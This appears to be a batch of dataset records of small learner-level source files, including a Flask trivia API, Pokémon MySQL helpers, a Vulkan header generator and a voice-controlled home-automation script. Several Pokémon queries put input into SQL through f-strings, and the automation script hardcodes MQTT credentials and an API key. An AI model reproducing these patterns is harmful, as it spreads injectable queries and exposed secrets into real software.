difficulty=data.get(\"difficulty\")\n )\n question.insert()\n\n return jsonify({\n \"success\": True\n })\n\n @app.route('/categories//questions')\n def search_by_category(category_id):\n category = Category.query.\\\n filter(\n Category.id == category_id\n ).\\\n one_or_none()\n\n if category is None:\n abort(404)\n\n questions = Question.query.\\\n filter(Question.category == category_id).\\\n order_by(Question.id.asc()).\\\n all()\n\n formatted_questions = [\n question.format()\n for question in questions\n ]\n\n return jsonify({\n \"questions\": formatted_questions,\n \"total_questions\": len(formatted_questions),\n \"current_category\": category_id\n })\n\n def validate_send_quiz_input(data):\n previous_questions = data.get(\"previous_questions\", [])\n quiz_category = data.get(\"quiz_category\")\n\n validation_errors = []\n if \"quiz_category\" not in data:\n validation_errors.append({\n \"type\": \"attribute_expected\",\n \"attribute\": \"quiz_category\",\n \"message\": required_attribute_template.format(\"quiz_category\")\n })\n elif type(quiz_category) is not dict:\n validation_errors.append({\n \"type\": \"invalid_type\",\n \"attribute\": \"quiz_category\",\n \"message\": object_expected_template.format(\"quiz_category\")\n })\n elif \"id\" not in data[\"quiz_category\"]:\n validation_errors.append({\n \"type\": \"attribute_expected\",\n \"attribute\": \"quiz_category.id\",\n \"message\": (\n required_attribute_template.format(\"quiz_category.id\"))\n })\n\n if \"previous_questions\" not in data:\n validation_errors.append({\n \"type\": \"attribute_expected\",\n \"attribute\": \"previous_questions\",\n \"message\": (\n required_attribute_template.format(\"previous_questions\"))\n })\n elif type(previous_questions) is not list:\n validation_errors.append({\n \"type\": \"invalid_type\",\n \"attribute\": \"previous_questions\",\n \"message\": list_expected_template.format(\"previous_questions\")\n })\n\n return validation_errors\n\n @app.route(\"/quizzes\", methods=[\"POST\"])\n def send_quiz():\n data = request.get_json()\n if not data:\n abort(400)\n\n validation_errors = validate_send_quiz_input(data)\n if validation_errors:\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": (\n \"The request could not be processed because\"\n \" of invalid data.\"),\n \"validation_errors\": validation_errors\n }), 400\n\n previous_questions = data[\"previous_questions\"]\n category_id = data[\"quiz_category\"][\"id\"]\n category_query = Category.query.filter(Category.id == category_id)\n if category_id != 0 and category_query.one_or_none() is None:\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": (\n \"The request could not be processed because\"\n \" of invalid data.\"),\n \"validation_errors\": [{\n \"type\": \"not_found\",\n \"attribute\": \"quiz_category.id\",\n \"message\": (\n not_found_template.format(\n \"quiz_category.id\",\n category_id))\n }]\n }), 400\n\n question_category_condition = True\n if category_id != 0:\n question_category_condition = Question.category == category_id\n\n question = Question.query.\\\n filter(\n ~Question.id.in_(previous_questions),\n question_category_condition\n ).\\\n order_by(func.random()).\\\n first()\n\n return jsonify({\n \"success\": True,\n \"question\": question.format() if question else None\n })\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": error.description\n }), 400\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": error.description\n }), 404\n\n @app.errorhandler(405)\n def method_not_allowed(error):\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": error.description\n }), 405\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": error.description\n }), 422\n\n @app.errorhandler(500)\n def internal_server_error(error):\n return jsonify({\n \"success\": False,\n \"type\": \"api_error\",\n \"message\": error.description\n }), 500\n\n return app\n\n\ndef is_integer(value):\n try:\n if type(value) is int:\n return True\n elif type(value) is str:\n int(value)\n else:\n return False\n except Exception:\n return False\n\n return True\n","repo_name":"eliasargandara/fsnd-trivia-api","sub_path":"backend/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"6382293808","text":"import pygame.font\n\n\nclass Button:\n\n def __init__(self, ai_settings, screen, msg):\n \"\"\"Inicializa os atributos do botão.\"\"\"\n self.screen = screen\n self.screen_rect = screen.get_rect()\n\n # Define as dimensões e as profundidades do botão\n self.width, self.height = 200, 50\n self.button_color = (0, 255, 0)\n self.text_color = (255, 255, 255)\n self.font = pygame.font.SysFont(None, 48)\n\n # Constrói o objeto rect do botão e o centraliza\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.center = self.screen_rect.center\n\n # A mensagem do botão deve ser pregada apenas uma vez\n self.prep_msg(msg)\n\n def prep_msg(self, msg):\n \"\"\"Transforma msg em imagem renderizada e centraliza o texto do botão.\"\"\"\n self.msg_image = self.font.render(msg, True, self.text_color, self.button_color)\n self.msg_image_rect = self.msg_image.get_rect()\n self.msg_image_rect.center = self.rect.center\n\n def draw_button(self):\n # Desenha um botão em branco e, em seguida, desenha a mensagem\n self.screen.fill(self.button_color, self.rect)\n self.screen.blit(self.msg_image, self.msg_image_rect)\n","repo_name":"RodrigoPiropo/ALIEN_INVASION","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"pt","doc_type":"code","stars":37,"dataset":"github-code","pt":"95"} +{"seq_id":"71994914234","text":"# Given a tree of integers and return the number of non-empty unival trees\n# A unival tree is a tree which contain all nodes with the same number.\n\n# DUMB SOLUTION\n\n# O(n)\ndef isUnival(root):\n if root == null:\n return True\n if root.left != null and root.left.value != root.value:\n return False\n if root.right != null and root.right.value != root.value: \n return False\n if isUnival(root.left) and isUnival(root.right):\n return True\n return False\n\n# O(n^2)\ndef countUnivals(root):\n if root == null:\n return 0\n\n count = countUnivals(root.left) + countUnivals(root.right)\n \n if isUnival(root):\n count += 1\n return count\n \n\n\n# GOOD SOLUTION O(n)\ndef countUnivals(root):\n count, is_unival = explore(root)\n return count\n\ndef explore(root):\n if root == null: return (0, True)\n left_count, is_left_unival = explore(root.left)\n right_count, is_right_unival = explore(root.right)\n \n is_unival = True\n if not is_left_unival or not is_right_unival:\n is_unival = False\n\n if root.left != null and root.left.value != root.value:\n is_unival = False\n\n if root.right != null and root.right.value != root.value:\n is_unival = False\n\n if is_unival:\n return (left_count + right_count +1, True)\n else:\n return (left_count + right_count, False)\n\n\n\n# Asked by Google","repo_name":"davide-coccomini/Algorithmic-problems","sub_path":"Python/univalTree.py","file_name":"univalTree.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"42835158994","text":"from functools import lru_cache\nimport re\n\ndef log_dict2key(dict_data_repr):\n key = _get_key_from_log_dict_repr(dict_data_repr)\n key = re.sub(r'[\\'\"]', '', key)\n return key\n\n\n@lru_cache(maxsize=4096 * 4, typed=False)\ndef _get_key_from_log_dict_repr(processed_log_dict_repr):\n processed_log_dict = eval(processed_log_dict_repr)\n sorted_keys = get_sorted_keys(tuple(processed_log_dict.keys()))\n sorted_list = []\n for k in sorted_keys:\n impl_repr = (k, processed_log_dict[k])\n sorted_list.append(impl_repr)\n key = repr(tuple(sorted_list))\n return key\n\n\n@lru_cache(maxsize=1024, typed=False)\ndef get_sorted_keys(keys):\n return sorted(keys, key=lambda x: x)","repo_name":"erxiaozhou/cp910_runtime_tester","sub_path":"log_content_util/log_dict2key_util.py","file_name":"log_dict2key_util.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7960748219","text":"import argparse\nimport gen_common\nimport sys\nimport xml.etree.ElementTree as ET\n\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input',\n help='Input XML cache file',\n required=True)\n parser.add_argument('-o', '--output',\n help='Output file to write to',\n required=True)\n parser.add_argument('-a', '--api',\n help='Khronos API being processed',\n required=True)\n args = parser.parse_args()\n\n try:\n dataXml = ET.parse(args.input)\n dataRoot = dataXml.getroot()\n except:\n print(\"Error: Could not open input file: \", args.input)\n sys.exit(1)\n\n # Get first/last versions\n firstVersion = int(dataRoot.get('first'))\n lastVersion = int(dataRoot.get('last'))\n\n outFile = open(args.output, \"w\")\n\n if args.api == 'vulkan':\n apiVersionStr = 'VK_HEADER_VERSION'\n enumType = 'VkResult'\n header = ''\n guard = 'VK_RESULT'\n elif args.api == 'openxr':\n apiVersionStr = '(XR_CURRENT_API_VERSION & 0xffffffffULL)'\n enumType = 'XrResult'\n header = ''\n guard = 'XR_RESULT'\n\n # Common Header\n gen_common.writeHeader(outFile)\n\n outFile.write(\"\"\"#ifndef {0}_TO_STRING_H\n#define {0}_TO_STRING_H\n\n/* USAGE\n To use, include this header where the declarations for the boolean checks are required.\n\n On *ONE* compilation unit, include the definition of:\n #define {0}_TO_STRING_CONFIG_MAIN\n\n so that the definitions are compiled somewhere following the one definition rule.\n*/\n\n#ifdef __cplusplus\nextern \"C\" {{\n#endif\n\n#include {1}\n\n\"\"\".format(guard, header))\n\n # Static asserts\n outFile.write('\\n#ifdef __cplusplus\\n')\n outFile.write(\n \"static_assert({0} >= {1}, \\\"{2} header version is from before the minimum supported version of v{1}.\\\");\\n\".format(apiVersionStr, firstVersion, args.api))\n outFile.write(\n \"static_assert({0} <= {1}, \\\"{2} header version is from after the maximum supported version of v{1}.\\\");\\n\".format(apiVersionStr, lastVersion, args.api))\n outFile.write('#else\\n')\n outFile.write(\n \"_Static_assert({0} >= {1}, \\\"{2} header version is from before the minimum supported version of v{1}.\\\");\\n\".format(apiVersionStr, firstVersion, args.api))\n outFile.write(\n \"_Static_assert({0} <= {1}, \\\"{2} header version is from after the maximum supported version of v{1}.\\\");\\n\".format(apiVersionStr, lastVersion, args.api))\n outFile.write('#endif\\n')\n\n outFile.write(\"\"\"\n/// Returns a string representing the given VkResult parameter. If there is no known representation,\n/// returns NULL.\nchar const *{0}_to_string({0} result);\n\"\"\".format(enumType))\n\n if args.api == 'vulkan':\n outFile.write(\"\"\"\n/// Similar to VkResult_to_string, except in the case where it is an unknown value, returns a string\n/// stating '(unrecognized positive/negative VkResult value)', thus never returning NULL.\nchar const *vkResultToString(VkResult result);\n\"\"\")\n\n outFile.write(\"\"\"\n#ifdef {0}_TO_STRING_CONFIG_MAIN\n\nchar const* {1}_to_string({1} result) {{\n // Check in descending order to get the 'latest' version of the error code text available.\n // Also, because codes have been re-used over time, can't use a switch and have to do this large set of ifs.\n // Luckily this *should* be a relatively rare call.\n\"\"\".format(guard, enumType))\n\n # Content\n currentVersion = lastVersion\n while currentVersion >= firstVersion:\n for enum in dataRoot.findall('enums/{}/values/'.format(enumType)):\n if int(enum.get('first')) != currentVersion:\n continue\n\n guarded = False\n # Guard check for first version\n if int(enum.get('first')) != firstVersion:\n guarded = True\n outFile.write(\n '#if {} >= {}'.format(apiVersionStr, enum.get('first')))\n # Guard check for last version\n if int(enum.get('last')) != lastVersion:\n if guarded:\n # If already started, append to it\n outFile.write(\n ' && {} <= {}'.format(apiVersionStr, enum.get('last')))\n else:\n guarded = True\n outFile.write(\n '#if {} <= {}'.format(apiVersionStr, enum.get('last')))\n # Guard check for platforms\n for platform in enum.findall('platforms/'):\n if guarded:\n # If already started, append to it\n outFile.write(' && {}'.format(platform.tag))\n else:\n guarded = True\n outFile.write('#if {}'.format(platform.tag))\n\n if guarded:\n outFile.write('\\n')\n\n outFile.write(' if (result == {})\\n'.format(enum.tag))\n outFile.write(' return \\\"{}\\\";\\n'.format(enum.tag))\n\n if guarded:\n outFile.write('#endif\\n')\n currentVersion -= 1\n\n # Footer\n outFile.write(\"\"\"\n return NULL;\n}\n\"\"\")\n\n if args.api == 'vulkan':\n outFile.write(\"\"\"\nchar const* vkResultToString(VkResult result) {\n char const* pResultString = VkResult_to_string(result);\n if(pResultString != NULL)\n return pResultString;\n\n if (result > 0)\n return \"(unrecognized positive VkResult value)\";\n else\n return \"(unrecognized negative VkResult value)\";\n}\n\"\"\")\n\n outFile.write(\"\"\"\n#endif // {0}_TO_STRING_CONFIG_MAIN\n\n#ifdef __cplusplus\n}}\n#endif\n\n#endif // {0}_TO_STRING_H\n\"\"\".format(guard))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"StableCoder/vulkan-mini-libs-2","sub_path":"tools/generate_result_string_header.py","file_name":"generate_result_string_header.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"16048305850","text":"import pymysql\r\nimport requests\r\nfrom flask import request\r\n\r\nimport pokeAPI\r\nfrom insert import insert\r\n\r\nconnection = pymysql.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n password=\"1234\",\r\n db=\"pokemon\",\r\n charset=\"utf8\",\r\n cursorclass=pymysql.cursors.DictCursor\r\n)\r\n\r\n\r\ndef is_pokemon_already(result):\r\n with connection.cursor() as cursor:\r\n cursor.execute(f\"select * from pokemon where id = {result['id']}\")\r\n if cursor.fetchall():\r\n return True\r\n return False\r\n\r\n#\r\n# def insert_pokemon(result):\r\n# tmp = [result]\r\n# insert(tmp)\r\n\r\n\r\ndef delete(pokemon_id, trainer_name):\r\n with connection.cursor() as cursor:\r\n query = f\"delete from pokemon_trainer where tname = \\\"{trainer_name}\\\" and pid = \\\"{pokemon_id}\\\";\"\r\n cursor.execute(query)\r\n connection.commit()\r\n\r\n\r\ndef is_pairs(trainer_name,pokemon_id):\r\n with connection.cursor() as cursor:\r\n cursor.execute(f\"select tname from pokemon_trainer where pid = {pokemon_id} and tname = '{trainer_name}'\")\r\n if cursor.fetchall():\r\n return True\r\n\r\ndef evolve(trainer_name,pokemon_id):\r\n with connection.cursor() as cursor:\r\n info = pokeAPI.get_info(pokemon_id)\r\n cursor.execute(f\"select name from pokemon where id = {pokemon_id}\")\r\n res = cursor.fetchone()\r\n tmp = info[\"chain\"]\r\n while tmp[\"species\"][\"name\"] != res[\"name\"]:\r\n tmp = tmp[\"evolves_to\"][0]\r\n if not tmp.get('evolves_to'):\r\n return \"Can't evolve\"\r\n cursor.execute(f\"select id from pokemon where name = '{tmp['evolves_to'][0]['species']['name']}'\")\r\n id = cursor.fetchone()\r\n if is_pairs(trainer_name,id['id']):\r\n return \"this trainer already has this Pokémon\"\r\n cursor.execute(f\"update pokemon_trainer set pid = {id['id']} where tname = '{trainer_name}' and pid = {pokemon_id}\")\r\n connection.commit()\r\n\r\ndef Get_name_pokemons_by_trainer(trainer):\r\n with connection.cursor() as cursor:\r\n query = f\"select pokemon.name from pokemon_trainer,pokemon where pokemon_trainer.tname = '{trainer}' and \" \\\r\n f\"pokemon_trainer.pid = pokemon.id \"\r\n cursor.execute(query)\r\n res = cursor.fetchall()\r\n return [x['name'] for x in res]\r\n\r\n\r\ndef get_pokemons_by_trainer(trainer):\r\n with connection.cursor() as cursor:\r\n cursor.execute(\r\n f\"select * from pokemon where id in (select pid from pokemon_trainer where tname = '{trainer}')\")\r\n return cursor.fetchall()\r\n\r\ndef get_pokemon_from_war(trainer):\r\n with connection.cursor() as cursor:\r\n cursor.execute( f\"select pokemon from war where trainer = '{trainer}'\")\r\n return cursor.fetchone()","repo_name":"LeahLevi/pokemon-project","sub_path":"pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3753192716","text":"\nimport matplotlib.pyplot as plt\n\nfrom boutdata.collect import collect\n\nf = collect(\"f\", path=\"data\")\nyup = collect(\"yup\", path=\"data\")\nydown = collect(\"ydown\", path=\"data\")\n\nplt.plot(f[0,4,4,:], label=\"f\")\nplt.plot(yup[4,4,:], label=\"f.yup\")\nplt.plot(ydown[4,4,:], label=\"f.ydown\")\n\nplt.legend()\n\nplt.savefig(\"plot_interp.pdf\")\nplt.show()\n","repo_name":"LinWeisheng/BOUT-lin-dev","sub_path":"tests/integrated/test-fci-slab/plot_interp.py","file_name":"plot_interp.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"29628464189","text":"print(\"Welcome to the Rollercoaster\")\r\nheight = int(input(\"what is your height in cm? \"))\r\n\r\nif height >= 120:\r\n print(\"You can ride the rollercoaster\")\r\n age = int(input(\"what is your age? \"))\r\n if age >= 45 and age <= 55:\r\n bill = 0 \r\n elif age >= 18:\r\n bill = 12 \r\n print(f\"Adult tickets are ${bill}\")\r\n elif age >= 12:\r\n bill = 7 \r\n print(f\"Youth ticketts are ${bill}\")\r\n else:\r\n bill = 5\r\n print(f\"Children tickets are ${bill}\")\r\n wants_Photo = input('Do you want a photo taken? Y or N ')\r\n if wants_Photo == 'Y' or wants_Photo == 'N' and age >= 45 and age <= 55:\r\n bill += 0\r\n print(f\"Your bill is ${bill}, You can ride for Free!\")\r\n elif wants_Photo == 'Y' and age < 45 and age > 55:\r\n bill += 3\r\n print(f\"Your bill is ${bill}, You can ride for Free!\")\r\n else:\r\n print(f\"Your bill is ${bill}\")\r\nelse:\r\n print(\"Sorry, you cannot ride the rollercoaster\")\r\n","repo_name":"Husayn01/Roller_Coaster.py","sub_path":"Rollercoaster.py","file_name":"Rollercoaster.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"42558694241","text":"from sqlalchemy import (Column, Index, UniqueConstraint)\nfrom sqlalchemy.dialects import mysql\nfrom .base import Base\nfrom .region import Region\nfrom .source import Source\nfrom .genomic_feature import GenomicFeature\nfrom .genomicFeatureMixin1 import GFMixin1\nfrom sqlalchemy.ext.declarative import declared_attr\n\nclass CpGIsland(GFMixin1, Base):\n\n __tablename__ = \"cpg_islands\"\n\n cpgs = Column(\"cpgs\", mysql.INTEGER, nullable=False)\n gcs = Column(\"gcs\", mysql.INTEGER, nullable=False)\n percent_cpg = Column(\"percent_cpg\", mysql.FLOAT, nullable=False)\n percent_gc = Column(\"percent_gc\", mysql.FLOAT, nullable=False)\n obsexp_ratio = Column(\"obsexp_ratio\", mysql.FLOAT, nullable=False)\n\n @declared_attr\n def __table_args__(cls):\n return (\n UniqueConstraint(cls.region_id, cls.source_id),\n Index(\"ix_join\", cls.region_id, cls.source_id),\n {\"mysql_engine\": \"InnoDB\", \"mysql_charset\": \"utf8\"}\n )\n\n \n @classmethod\n def as_genomic_feature(self, feat):\n\n qualifiers = {\n \"uid\": feat.CpGIsland.uid,\n \"cpgs\": feat.CpGIsland.cpgs,\n \"gcs\": feat.CpGIsland.gcs,\n \"percent_cpg\": feat.CpGIsland.percent_cpg,\n \"percent_gc\": feat.CpGIsland.percent_gc,\n \"obsexp_ratio\": feat.CpGIsland.obsexp_ratio,\n \"source\": feat.sourceName,\n }\n\n genomic_feature = super().as_genomic_feature(feat)\n genomic_feature.qualifiers = qualifiers\n return genomic_feature","repo_name":"wassermanlab/GUD","sub_path":"GUD/ORM/cpg_island.py","file_name":"cpg_island.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36340425812","text":"#!/usr/bin/python3\n\nfrom random import randint\nfrom Files.task import Task\n\nclass Utilisation:\n\n def __init__(self,numberOfTasks,utilisationFactor):\n self._utilisation = utilisationFactor\n self._numberOfTasks = numberOfTasks\n self._use = self.splitUtilisation()\n self._result = self.findUsage()\n\n def splitUtilisation(self):\n result = [randint(1,100) for i in range(self._numberOfTasks)]\n ratio = self._utilisation/sum(result)\n result = [round(value*ratio) for value in result]\n return result\n\n def findSystem(self):\n result = []\n for use in self._use:\n print(use)\n Ti = randint(1,1000)\n Ci = round(use*(Ti/100))\n task = Task()\n task.setAll(0, 0, Ti, random(Ci,Ti), Ci)\n result.append(task)\n return result\n\n # Print result\n def printUse(self):\n print(\"Total use : \"+str(sum(self._use)), end=\"\")\n print(\" (\"+\" \".join(str(self._use))+\")\")\n\n def printSystem(self):\n for task in self._result:\n print(task.toString())\n","repo_name":"NathanLiccardo/INFO-F404","sub_path":"src/Part1/Generator/utilisation.py","file_name":"utilisation.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71246949114","text":"import pandas as pd\nfrom pcapng_access import SharkdDataAccess\n\n\ndef get_json_bytes(json_string):\n return bytes((json_string + '\\n'), 'utf-8')\n\ndef safe_float(string_in):\n try:\n out = float(string_in)\n except:\n out = None\n return out\n\n\nclass SharkdSession:\n json_trace = False\n s = \"\"\n is_connected = False\n rpcid = 0\n data_access = SharkdDataAccess()\n\n def __init__(self, ip_address, port):\n self.data_access.start_session(ip_address, port)\n self.is_connected = True\n\n def sharkd_load(self, filespec):\n params = f'\"file\":\"{filespec}\"'\n return self.data_access.rpc_send_recv('load', params )\n\n def sharkd_analyse(self):\n return self.data_access.rpc_send_recv('analyse', None)\n\n def sharkd_get_status(self):\n return self.data_access.rpc_send_recv('status', None)\n\n def set_config(self, params):\n data_out = self.data_access.rpc_send_recv('setconf', params)\n return\n\n def get_conversations_ip(self):\n params = '\"tap0\":\"conv:IP\"'\n data_out = self.data_access.rpc_send_recv('tap', params)[0]['result']['taps'][0]['convs']\n df = pd.DataFrame(data=data_out)\n df['proto'] = 'IP'\n return df\n\n def get_conversations_tcp(self):\n params = '\"tap0\":\"conv:TCP\"'\n data_out = self.data_access.rpc_send_recv('tap', params)[0]['result']['taps'][0]['convs']\n df = pd.DataFrame(data=data_out)\n df['proto'] = 'TCP'\n return df\n\n def get_conversations_udp(self):\n params = '\"tap0\":\"conv:UDP\"'\n data_out = self.data_access.rpc_send_recv('tap', params)[0]['result']['taps'][0]['convs']\n df = pd.DataFrame(data=data_out)\n df['proto'] = 'UDP'\n return df\n\n def get_conversations_sctp(self):\n params = '\"tap0\":\"conv:SCTP\"'\n data_out = self.data_access.rpc_send_recv('tap', params)[0]['result']['taps'][0]['convs']\n df = pd.DataFrame(data=data_out)\n df['proto'] = 'SCTP'\n return df\n\n def get_frame(self, framenum):\n params = f'\"frame\":{framenum}, \"proto\":true'\n return self.data_access.rpc_send_recv('frame', params)\n\n def get_frames(self, filter_expression, ws_fields):\n self.rpcid += 1\n index = 0\n pkt_list_cols = ''\n\n # make sure the data_access object knows the data type\n # for each field\n self.data_access.init_schema(ws_fields)\n\n for ws_field in ws_fields:\n pkt_list_cols += f'\"column{index}\":\"{ws_field}:1\"'\n index += 1\n\n if filter_expression == None:\n params = pkt_list_cols\n else:\n params = f'\"filter\":\"{filter_expression}\", {pkt_list_cols}'\n\n response, rsp_code, msg = self.data_access.rpc_send_recv('frames', params)\n pkts = response['result']\n\n data_out = []\n for pkt in pkts:\n new_row = []\n for j in range(len(ws_fields)):\n ######## MODIFy this to translate the value type\n new_row.append(self.data_access.switch_ftype(pkt['c'][j], j))\n data_out.append(new_row)\n\n df = pd.DataFrame(data=data_out)\n if df.size > 0:\n df.columns = ws_fields\n\n return df\n\n def get_dns(self, filter_expression) -> object:\n cols = [\n \"frame.number\",\n \"ip.src\",\n \"ip.dst\",\n \"dns.flags.response\",\n \"dns.id\",\n \"dns.qry.name\",\n \"transum.art\",\n \"transum.status\",\n ]\n if filter_expression:\n filter_exp = f'dns && ( {filter_expression} )'\n else:\n filter_exp = 'dns'\n\n return self.get_frames(filter_exp, cols)\n\n def get_rte(self, filter_exp) -> object:\n cols = [\n 'frame.number',\n 'ip.src',\n 'tcp.srcport',\n 'ip.dst',\n 'tcp.dstport',\n 'transum.art',\n 'transum.st',\n 'transum.reqspread',\n 'transum.rspspread',\n 'transum.status',\n ]\n\n return self.get_frames(filter_exp, cols)\n\n def get_ip_ttl(self) -> object:\n cols = [\n \"frame.number\",\n \"ip.src\",\n \"ip.dst\",\n \"ip.ttl\",\n ]\n filter_exp = 'ip'\n return self.get_frames(filter_exp, cols)\n\n def get_start_end(self) -> tuple[str, str]:\n status = self.sharkd_get_status()\n last_frame = int(status[0]['result']['frames'])\n cols = [\n \"frame.number\",\n \"frame.time\",\n \"frame.time_epoch\",\n ]\n first_frame_detail = self.get_frames('frame.number==1', cols)\n last_frame_detail = self.get_frames(f'frame.number=={last_frame}', cols)\n return first_frame_detail['frame.time'][0], last_frame_detail['frame.time'][0]\n\n def get_expert(self):\n params = '\"tap0\":\"expert\"'\n expert_response = self.data_access.rpc_send_recv('tap', params)\n expert_pkts = expert_response[0]['result']['taps'][0]['details']\n return pd.DataFrame(data=expert_pkts)\n\n def get_tcp_seg_meta(self, data_only):\n cols = [\n 'tcp.stream',\n 'ip.src',\n 'tcp.srcport',\n 'ip.dst',\n 'tcp.dstport',\n 'frame.number',\n 'frame.time_relative',\n 'ip.id',\n 'tcp.seq_raw',\n 'tcp.ack_raw',\n 'tcp.analysis.retransmission',\n 'tcp.analysis.duplicate_ack_frame',\n ]\n if data_only:\n filter_exp = 'tcp.len>0'\n else:\n filter_exp = 'tcp'\n\n return self.get_frames(filter_exp, cols)\n\n def sharkd_close(self):\n self.data_access.close_session()\n","repo_name":"credible58/papr","sub_path":"sharkd.py","file_name":"sharkd.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"95"} +{"seq_id":"70213461753","text":"# PROJET2\n# objet Intelligent :\n# mis en relation de protocole reseau mqtt, interface graphique,\n# base de donnees mongodb, api meteo, gpio et traitement language naturel\n\n\n\nfrom speech_recognition import Recognizer, Microphone\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nfrom PicoTTS import TTS_engine\nfrom PIL import Image as IMG, ImageTk\nfrom time import sleep\nimport paho.mqtt.client as mqtt\nimport datetime\nimport pymongo\nfrom RPiSim import GPIO\nfrom tkinter import *\nfrom project2_mongoconsole import *\nfrom threading import Thread\nimport requests\nfrom pyowm import OWM\nfrom pyowm.utils.config import get_default_config\nimport os\n\n# constante du programme\npin_lum1 = 18 # lumiere entree\npin_lum2 = 17 # lumiere salone\npin_alarm = 15 # sys alarme\npin_porte = 13 # porte\n\netat_lum1 = \"OFF\"\netat_lum2 = \"OFF\"\netat_alarm = \"DISARMED\"\netat_porte = \"CLOSE\"\nrunning = True\nchannel_gpio = \"eventdevice\"\n\ntext = \"\"\nphrases = [u\"quelle heure est-il?\",\n u\"il est quelle heure?\",\n u\"quelle heure il est?\",\n \n u\"quel temps fait-il?\",\n u\"quel est la température?\",\n u\"quel est la météo?\",\n u\"quelles sont les prévision météo?\",\n u\"quelles sont les prévisions de la météo?\",\n u\"quelle temperature fait-il?\",\n \n u\"ouvrir la lumière de l'entrer\",\n u\"ouvre la lumière de l'entrer\",\n u\"ouvre la lumière d'entrer\",\n u\"allumer la lumière de l'entrer\",\n u\"fermer la lumière de l'entrer\",\n u\"ferme la lumière de l'entrer\",\n u\"éteindre la lumière de l'entrer\",\n \n u\"ouvrir la lumière du salon\",\n u\"ouvre la lumière du salon\",\n u\"allumer la lumière du salon\",\n u\"fermer la lumière du salon\",\n u\"éteindre la lumière du salon\",\n \n u\"ouvrir la porte\",\n u\"ouvre la porte\",\n u\"ouverture de la porte\",\n u\"fermer la porte\",\n u\"ferme la porte\",\n u\"fermeture de la porte\",\n \n u\"fermer le système d'alarme\",\n u\"ferme le système d'alarme\",\n u\"éteindre le système d'alarme\",\n u\"arreter le système d'alarme\",\n u\"désarmer le système d'alarme\",\n u\"allumer le système d'alarme\",\n u\"ouvrir le système d'alarme\",\n u\"ouvre le système d'alarme\",\n u\"démarrer le système d'alarme\",\n u\"armer le système d'alarme\"\n ]\n\n# instanciation du module integrant mongodb\nmong = MongoConsole(\"localhost\", \"evenement\", \"historique\")\n\n# instanciation des modules vocaux\nrecognizer = Recognizer()\ntts = TTS_engine()\n\n# initialisation du protocole mqtt\nhost = \"node02.myqtthub.com\"\nport = 1883\nclean_session = True\nclient_id = \"telephone\"\nuser_name = \"popocoagul\"\npassword = \"Popo21popo21ecole\"\n\nclient = mqtt.Client(client_id = client_id, clean_session = clean_session)\nclient.username_pw_set (user_name, password)\nclient.connect (host, port)\n\n\n# initialisation du protocole gpio\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(pin_lum1,GPIO.MODE_OUT, initial=GPIO.LOW) #lumiere 1\nGPIO.setup(pin_lum2,GPIO.MODE_OUT, initial=GPIO.LOW) #lumiere 2\nGPIO.setup(pin_alarm,GPIO.MODE_OUT, initial=GPIO.LOW) #alarme \nGPIO.setup(pin_porte,GPIO.MODE_OUT, initial=GPIO.LOW) #alarme \n\n\n\n# initialisation du protocole openmediaweather\nconfig_dict = get_default_config()\nconfig_dict['language'] = 'fr'\n\nowm = OWM('f29f5d4679785c63240b83b42f050dd8', config_dict)\nmgr = owm.weather_manager()\n\nobservation = mgr.weather_at_place('Montreal,CA')\nmeteo = observation.weather\n\n\n\n#SYSTEME VOX\n# fonction d'ecoute de langage naturel \ndef listening():\n global text\n text = \"\"\n with Microphone() as source:\n print(\"Réglage du bruit ambiant... Patientez...\")\n recognizer.adjust_for_ambient_noise(source)\n print(\"Vous pouvez parler...\")\n try:\n recorded_audio = recognizer.listen(source, 10)\n print(\"Enregistrement terminé !\")\n try:\n print(\"Reconnaissance du texte...\")\n text = recognizer.recognize_google(recorded_audio,language=\"fr-FR\")\n print(\"Vous avez dit : {}\".format(text))\n textlist = list(text.split())\n print (textlist)\n return text\n except Exception as ex:\n print(ex)\n print(\"cant return text\") \n except:\n tts.say(\"Aucune commande détecté\")\n print(\"no command detected\")\n\n# fonction d'analyse du texte recuperer lors de l'ecoute de langue naturel\ndef analyze(): \n if text == 